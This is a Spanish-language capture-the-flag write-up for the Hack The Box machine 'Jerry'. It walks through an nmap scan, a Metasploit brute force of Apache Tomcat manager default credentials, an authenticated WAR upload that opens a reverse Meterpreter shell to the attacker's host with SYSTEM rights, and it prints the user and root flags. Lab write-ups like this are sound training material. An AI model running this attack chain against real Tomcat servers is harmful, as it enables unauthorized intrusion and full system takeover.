[HTB] Jerry

Hoy vamos a hackear la maquina de HTB llamada Jerry. Esta catalogada como facil.

Enumeration



sml@m0nikE:~/ctf/htb/machines/jerry$ sudo nmap -A -p- -sS 10.10.10.95 
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-05 21:04 CET
Nmap scan report for 10.10.10.95
Host is up (0.041s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 
open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows 
Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 
(91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 
(86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows 
Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 
Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or 
Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 8080/tcp)
HOP RTT      ADDRESS
1   41.26 ms 10.10.14.1
2   43.46 ms 10.10.10.95

OS and Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.82 seconds
Vemos que usa Apache Tomcat asi que vamos a usar metasploit para ver si podemos hacer bruteforce y obtener los credenciales. Para ello usamos el modulo de auxiliary/scanner/http/tomcat_mgr_login y usamos como diccionario el que viene por defecto.

Bruteforce Tomcat



msf5 > use auxiliary/scanner/http/tomcat_mgr_login
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                            
                     Required  Description
   ----              ---------------                                            
                     --------  -----------
   BLANK_PASSWORDS   false                                                      
                     no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                          
                     yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                      
                     no        Try each user/password couple stored in the 
current database
   DB_ALL_PASS       false                                                      
                     no        Add all passwords in the current database to the 
list
   DB_ALL_USERS      false                                                      
                     no        Add all users in the current database to the list
   PASSWORD                                                                     
                     no        The HTTP password to specify for authentication
   PASS_FILE         
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      
no        File containing passwords, one per line
   Proxies                                                                      
                     no        A proxy chain of format 
type:host:port[,type:host:port][...]
   RHOSTS                                                                       
                     yes       The target host(s), range CIDR identifier, or 
hosts file with syntax 'file:'
   RPORT             8080                                                       
                     yes       The target port (TCP)
   SSL               false                                                      
                     no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                      
                     yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                              
                     yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                          
                     yes       The number of concurrent threads (max one per 
host)
   USERNAME                                                                     
                     no        The HTTP username to specify for authentication
   USERPASS_FILE     
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  
no        File containing users and passwords separated by space, one pair per 
line
   USER_AS_PASS      false                                                      
                     no        Try the username as the password for all users
   USER_FILE         
/usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     
no        File containing users, one per line
   VERBOSE           true                                                       
                     yes       Whether to print output for all attempts
   VHOST                                                                        
                     no        HTTP server virtual host

msf5 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 10.10.10.95
rhosts => 10.10.10.95
msf5 auxiliary(scanner/http/tomcat_mgr_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: tomcat:tomcat (Incorrect)
[+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret
[-] 10.10.10.95:8080 - LOGIN FAILED: both:admin (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:manager (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:role1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:root (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 10.10.10.95:8080 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Obtenemos los credenciales: [+] 10.10.10.95:8080 - Login Successful: tomcat:s3cret Con los credenciales podemos usar el exploit exploit/multi/http/tomcat_mgr_upload para ver si podemos conseguir una shell.

Exploitation



msf5 auxiliary(scanner/http/tomcat_mgr_login) > use 
exploit/multi/http/tomcat_mgr_upload
msf5 exploit(multi/http/tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified 
username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format 
type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR 
identifier, or hosts file with syntax 'file:'
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing 
connections
   TARGETURI     /manager         yes       The URI path of the manager app 
(/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf5 exploit(multi/http/tomcat_mgr_upload) > set rhosts 10.10.10.95
rhosts => 10.10.10.95
msf5 exploit(multi/http/tomcat_mgr_upload) > set httppassword s3cret
httppassword => s3cret
msf5 exploit(multi/http/tomcat_mgr_upload) > set httpusername tomcat
httpusername => tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set rport 8080
rport => 8080
msf5 exploit(multi/http/tomcat_mgr_upload) > exploit

[*] Started reverse TCP handler on 10.10.14.29:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying Si6Mp3gsdJ...
[*] Executing Si6Mp3gsdJ...
[*] Undeploying Si6Mp3gsdJ ...
[*] Sending stage (53906 bytes) to 10.10.10.95
[*] Meterpreter session 1 opened (10.10.14.29:4444 -> 10.10.10.95:49192) at 
2019-12-05 21:07:31 +0100

meterpreter > 
meterpreter > getuid
Server username: JERRY$
Bien, tenemos una shell. Vamos a ver que privilegios tenemos y obtener los flags.

user.txt and root.txt



meterpreter > shell
Process 2 created.
Channel 2 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>cd ..
cd ..

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\

06/19/2018  03:07 AM               apache-tomcat-7.0.88
08/22/2013  05:52 PM               PerfLogs
06/19/2018  05:42 PM               Program Files
06/19/2018  05:42 PM               Program Files (x86)
06/18/2018  10:31 PM               Users
06/19/2018  05:54 PM               Windows
               0 File(s)              0 bytes
               6 Dir(s)  27,631,341,568 bytes free

C:\>cd users
cd users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\Users

06/18/2018  10:31 PM               .
06/18/2018  10:31 PM               ..
06/18/2018  10:31 PM               Administrator
08/22/2013  05:39 PM               Public
               0 File(s)              0 bytes
               4 Dir(s)  27,631,341,568 bytes free

C:\Users>cd administrator
cd administrator

C:\Users\Administrator>cd desktop
cd desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\Users\Administrator\Desktop

06/19/2018  06:09 AM               .
06/19/2018  06:09 AM               ..
06/19/2018  06:09 AM               flags
               0 File(s)              0 bytes
               3 Dir(s)  27,631,341,568 bytes free

C:\Users\Administrator\Desktop>cd flags
cd flags

C:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM               .
06/19/2018  06:09 AM               ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,631,271,936 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
C:\Users\Administrator\Desktop\flags>

End


Y con esto ya tendriamos el flag del "user" y el flag de "root".